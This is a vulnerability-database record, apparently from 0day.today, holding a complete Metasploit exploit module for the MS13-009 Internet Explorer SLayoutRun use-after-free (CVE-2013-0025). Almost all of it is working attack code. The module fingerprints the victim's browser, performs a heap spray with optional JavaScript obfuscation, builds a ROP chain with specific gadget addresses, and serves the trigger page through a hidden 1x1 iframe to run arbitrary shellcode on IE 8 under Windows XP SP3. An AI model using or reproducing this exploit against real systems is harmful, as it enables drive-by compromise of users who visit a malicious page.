Description
Exploit for windows platform in category remote exploits
{"id": "1337DAY-ID-20367", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)", "description": "Exploit for windows platform in category remote exploits", "published": "2013-02-14T00:00:00", "modified": "2013-02-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/20367", "reporter": "Scott Bell", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-05T03:11:48", "viewCount": 7, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-0025"]}]}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/20367", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n \r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer SLayoutRun Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\r\n where a CParaElement node is released but a reference is still kept\r\n in CDoc. This memory is reused when a CDoc relayout is performed.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Scott Bell <[email\u00a0protected]>', # Vulnerability discovery & Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0025' ],\r\n [ 'MSB', 'MS13-009' ],\r\n [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n \r\n end\r\n \r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n \r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n \r\n ie_name = \"IE #{ie}\"\r\n \r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n end\r\n \r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n \r\n return nil\r\n end\r\n \r\n def heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n \r\n js = %Q|\r\n \r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n var overflow = nops.substring(0, 10);\r\n \r\n |\r\n \r\n js = heaplib(js, {:noobfu => true})\r\n \r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n \r\n end\r\n \r\n return js\r\n end\r\n \r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n \r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n rop_nops = [0x77c39f92].pack(\"V\") * 11 # RETN\r\n rop_payload = generate_rop_payload('msvcrt', \"\", {'target'=>'xp'})\r\n rop_payload << rop_nops\r\n rop_payload << [0x77c364d5].pack(\"V\") # POP EBP # RETN\r\n rop_payload << [0x77c15ed5].pack(\"V\") # XCHG EAX, ESP # RETN\r\n rop_payload << [0x77c35459].pack(\"V\") # PUSH ESP # RETN\r\n rop_payload << [0x77c39f92].pack(\"V\") # RETN\r\n rop_payload << [0x0c0c0c8c].pack(\"V\") # Shellcode offset\r\n rop_payload << code\r\n \r\n end\r\n \r\n return rop_payload\r\n end\r\n \r\n def this_resource\r\n r = get_resource\r\n return ( r == '/') ? '' : r\r\n end\r\n \r\n def get_exploit(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = heap_spray(my_target, p)\r\n \r\n \r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n var data\r\n var objArray = new Array(1800);\r\n #{js}\r\n \r\n setTimeout(function(){\r\n for (var i=0;i<objArray.length;i++){\r\n objArray[i] = document.createElement('body');\r\n document.body.appendChild(objArray[i])\r\n objArray[i].style.display = \"none\"\r\n }\r\n \r\n document.body.style.whiteSpace = \"pre-line\"\r\n \r\n for(var i=0;i<10;i++){\r\n for (var i=0;i<(objArray.length-650);i++){\r\n objArray[i].className = data += unescape(\"%u0c0c%u0c0c\");\r\n }\r\n }\r\n \r\n setTimeout(function(){document.body.innerHTML = \"boo\"}, 100)\r\n }, 100)\r\n \r\n </script>\r\n </head>\r\n <body>\r\n <p> </p>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def get_iframe\r\n html = %Q|\r\n <html>\r\n <body>\r\n <iframe src=\"#{this_resource}/#{@iframe_name}\" height=\"1\" width=\"1\"></iframe>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n \r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n \r\n if uri =~ /#{@iframe_name}/\r\n html = get_exploit(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n elsif uri=~ /\\/$/\r\n html = get_iframe\r\n print_status \"Sending IFRAME...\"\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n \r\n \r\n end\r\n \r\n def exploit\r\n @iframe_name = \"#{Rex::Text.rand_text_alpha(5)}.html\"\r\n super\r\n end\r\nend\n\n# 0day.today [2018-02-05] #", "_state": {"dependencies": 1647589307, "score": 1659703426}}
{}
Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)